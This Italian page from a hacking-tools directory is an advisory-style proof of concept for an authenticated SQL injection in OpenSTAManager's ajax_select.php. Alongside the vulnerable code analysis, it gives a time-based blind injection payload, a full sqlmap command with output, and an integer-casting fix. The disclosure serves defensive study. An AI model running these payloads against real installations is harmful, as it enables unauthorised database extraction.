Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-69214 — Proof-of-concept per CVE-2025-69214: SQL injection nell'endpoint componenti di ajax_select.php di OpenSTAManager. Include analisi del codice vulnerabile, sfruttamento blind basato sul tempo con SQLMap e indicazioni di remediation. | Kitploit
Strumenti/GitHubGitHub/lukasz-rybak/cve-2025-69214
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneSicurezza dei Database
GitHublukasz-rybak/cve-2025-69214

CVE-2025-69214

Proof-of-concept per CVE-2025-69214: SQL injection nell'endpoint componenti di ajax_select.php di OpenSTAManager. Include analisi del codice vulnerabile, sfruttamento blind basato sul tempo con SQLMap e indicazioni di remediation.

Vedi Repository
35 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-69214: OpenSTAManager presenta una SQL Injection in ajax_select.php (endpoint componenti)

Panoramica

CampoDettagli
ID CVECVE-2025-69214
GravitàALTA
AdvisoryVisualizza Advisory
Scoperto daLukasz Rybak

Prodotti Interessati

  • devcode-it/openstamanager (versioni: <= 2.9.8)

Classificazione CWE

  • CWE-89: Neutralizzazione impropria di elementi speciali usati in un comando SQL ('SQL Injection')

Dettagli

Riepilogo

Una vulnerabilità di SQL Injection è presente nell'endpoint ajax_select.php quando viene gestita l'operazione componenti. Un attaccante autenticato può iniettare codice SQL malevolo tramite il parametro options[matricola].

Prova di concetto

Codice Vulnerabile

File: modules/impianti/ajax/select.php:122-124

root@kitploit:~
case 'componenti':
    $impianti = $superselect['matricola'];
    if (!empty($impianti)) {
        $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
    }

Flusso dei Dati

  1. Sorgente: $_GET['options']['matricola'] → $superselect['matricola']
  2. Punto vulnerabile: L'input dell'utente viene concatenato direttamente nella clausola IN() senza sanitizzazione
  3. Sink: La query viene eseguita tramite il framework AJAX

Exploit

PoC manuale (Blind SQLi basata sul tempo):

root@kitploit:~
GET /ajax_select.php?op=componenti&options[matricola]=1) AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND (1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
immagine

Sfruttamento con SQLMap:

root@kitploit:~
sqlmap -u 'http://localhost:8081/ajax_select.php?op=componenti&options[matricola]=1*' \
  --cookie="PHPSESSID=<session>" \
  --dbms=MySQL \
  --technique=T \
  --level=3 \
  --risk=3

Output di SQLMap:

root@kitploit:~
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: options[matricola]=1) AND (SELECT 7438 FROM (SELECT(SLEEP(5)))grko)-- SvRI
back-end DBMS: MySQL >= 5.0.12
immagine

Impatto

  • Esfiltrazione dei dati: La SQL injection blind basata sul tempo consente l'estrazione completa del database
  • Bypass dell'autenticazione: Accesso a dati sensibili di componenti e apparecchiature
  • Manipolazione dei dati: Potenziale modifica non autorizzata dei record

Correzione

Eseguire il cast dei valori a interi prima di utilizzarli in SQL:

Prima:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $where[] = '`my_componenti`.`id_impianto` IN ('.$impianti.')';
}

Dopo:

root@kitploit:~
$impianti = $superselect['matricola'];
if (!empty($impianti)) {
    $ids = array_map('intval', explode(',', $impianti));
    $where[] = '`my_componenti`.`id_impianto` IN ('.implode(',', $ids).')';
}

Crediti

Scoperto da: Łukasz Rybak

Riferimenti

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-qjv8-63xq-gq8m
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69214
  • https://github.com/advisories/GHSA-qjv8-63xq-gq8m

Disclaimer

Questa CVE è stata divulgata in modo responsabile seguendo le pratiche di divulgazione coordinata delle vulnerabilità. Le informazioni qui fornite hanno scopo esclusivamente educativo e difensivo.

Scarica lo strumento